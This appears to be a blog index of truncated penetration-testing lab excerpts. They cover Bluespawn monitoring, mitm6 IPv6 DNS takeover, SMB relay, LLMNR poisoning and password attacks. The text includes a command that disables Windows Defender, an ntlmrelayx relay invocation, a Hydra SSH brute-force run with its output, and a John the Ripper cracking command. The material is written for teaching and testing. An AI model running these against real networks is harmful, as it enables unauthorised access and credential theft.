Posts

Atomic Red Team Testing with Bluespawn

Bluespawn

In this lab we will be using Bluespawn as an alternative to an EDR system. Normally full EDRs like Cylance, Symantec and CrowdStrike are very expensive and tend not to show up in classes like this. BlueSpawn will monitor the system for "weird" behavior and note it when it occurs. In this lab, we will start BlueSpawn and then run Atomic Red Team to trigger a lot of alerts.

First, let's disable Defender. Simply run the following from an Administrator PowerShell prompt:

Set-MpPreference -DisableRealtimeMonitoring $true

This will disable Defender for this session. If you get angry red errors, that is OK: it means Defender is not running.

Let's get started by opening a Terminal as Administrator. Now, let's open a Command Prompt. Next, let's change directories to tools and start Bluespawn:

C:\Users\adhd>cd \tools
C:\tools>BLUESPAWN-client-x64.exe --monitor --level Cursory

Now, let's use Atomic Red Team to test the monitoring with BlueSpawn: Firs...

IPv6 DNS take-over via mitm6 - compromising IPv4 networks via IPv6

Compromising IPv4 networks via IPv6

While IPv6 adoption is gaining traction, company networks that use IPv6 internally are quite rare. However, most companies are unaware that while IPv6 might not be actively in use, all Windows versions since Windows Vista (including server variants) have IPv6 enabled and prefer it over IPv4. In this write-up, we explore an attack that abuses the default IPv6 configuration in Windows networks to spoof DNS replies by acting as a malicious DNS server and redirect traffic to an attacker-specified endpoint or relay. We can abuse this exact functionality to gain control over the network and potentially dump the NTLM hashes from ntds.dit, create users, add users to privileged groups (e.g. Enterprise Admins), etc. on the domain controller. The ntds.dit file is a database that stores information about user objects, groups and group memberships, and password hashes for all users in the domain. This attack attempts a DNS takeover in a network via IPv6 using...

How to install mitm6

What is mitm6?

mitm6 is a pentesting tool that exploits the default configuration of Windows to take over the default DNS server. It does this by replying to DHCPv6 messages, providing victims with a link-local IPv6 address and setting the attacker's host as default DNS server. As DNS server, mitm6 will selectively reply to DNS queries of the attacker's choosing and redirect the victims' traffic to the attacker machine instead of the legitimate server.

Reference: https://github.com/dirkjanm/mitm6

Dependencies and installation

mitm6 is compatible with both Python 2.7 and 3.x. You can install the requirements for your version with "pip install -r requirements.txt". In my case, I have to use the following command, "pip3 install", as "pip install -r requirements.txt" does not work for me.

To start with, go to Google search and look for "github mitm6", then clone the repository.

┌──(root㉿kali)-[/opt]
└─# git clone https://github.com/dirkjanm/mitm6.git

Depende...

SMB Relay Attack

SMB Relay Attack Overview

SMB is commonly used for sharing files, printers and communication between client and server. Before one can communicate with the other, the user will be required to authenticate themselves. This is simple access control. Although this control can help protect those important files, it can also be manipulated to allow authentication attempts to be relayed and used to access systems. It can also be abused in order to collect password hashes. This is where SMB relay comes into play. The attacker places themselves in the middle (MiTM) and relays the attempts. Once the end server has validated the credentials, the access is granted to the attacker instead of the user.

What is an SMB Relay Attack?

An SMB relay attack is where an attacker captures a user's NTLM hash and relays it to another machine on the network, masquerading as the user and authenticating against SMB to gain shell or file access.

Prerequisites

- SMB signing disabled on the target
- Must be on the local...

How to install Impacket/Ntlmrelayx.py

Ntlmrelayx.py is a Python script that will simply relay NTLMv1/v2 hashes. Installing it is straightforward on Kali Linux.

Step 1: Install the dependencies

Ldapdomaindump is needed first, which can be installed by typing:

┌──(root㉿kali)-[/home/kali/ActiveDirectory]
└─# pip install ldap3 dnspython

┌──(root㉿kali)-[/home/kali/ActiveDirectory]
└─# pip install ldapdomaindump

Step 2: Once the dependencies are installed, download the Impacket suite:

┌──(root㉿kali)-[/home/kali/ActiveDirectory]
└─# git clone https://github.com/CoreSecurity/impacket.git

Once downloaded, go to the directory and install it:

┌──(root㉿kali)-[/home/kali/ActiveDirectory/impacket]
└─# python setup.py install

Once installed, you can run ntlmrelayx.py from any directory:

┌──(root㉿kali)-[/home/kali/ActiveDirectory/impacket]
└─# ntlmrelayx.py -tf target.txt -smb2support

LLMNR/NBT-NS Poisoning | Taking Advantage of NTLM Security Weaknesses

In this write-up we will talk about LLMNR/NBT-NS poisoning, as this attack vector is still prevalent nowadays. The vast majority of assessments result in obtaining NTLMv1 and NTLMv2 hashes, which can be cracked to gain Administrator access. In our example, we will use the tool called "RESPONDER" to intercept traffic from the network and gather these NTLMv1 and NTLMv2 hashes to our advantage, and then we will give an overview of how these attacks work.

LLMNR/NBT-NS Poisoning Overview

Attackers can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary-controlled system.

What is LLMNR?

- Used to identify hosts when DNS fails to do so
- Previously NBT-NS
- Key flaw is that the services utilize a user's username and NTLMv2 h...

Password Hacking Hydra

hydra -l user -p fasttrack.txt ssh://192.168.220.131 -V -I -F -t 40

┌──(root㉿kali)-[/usr/share/wordlists]
└─# hydra -l jeanpaul -p fasttrack.txt ssh://192.168.220.131 -V -I -F -t 4
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-07 00:31:22
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking ssh://192.168.220.131:22/
[ATTEMPT] target 192.168.220.131 - login "jeanpaul" - pass "fasttrack.txt" - 1 of 1 [child 0] (0/0)
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-07 00:31:24

JohnTheRipper:

john /tmp/hashes --wordlist /usr/share/wordlists/fasttrack.txt --format=crypt

Password Store in Windows: NTDS.DIT, SAM file, Reg...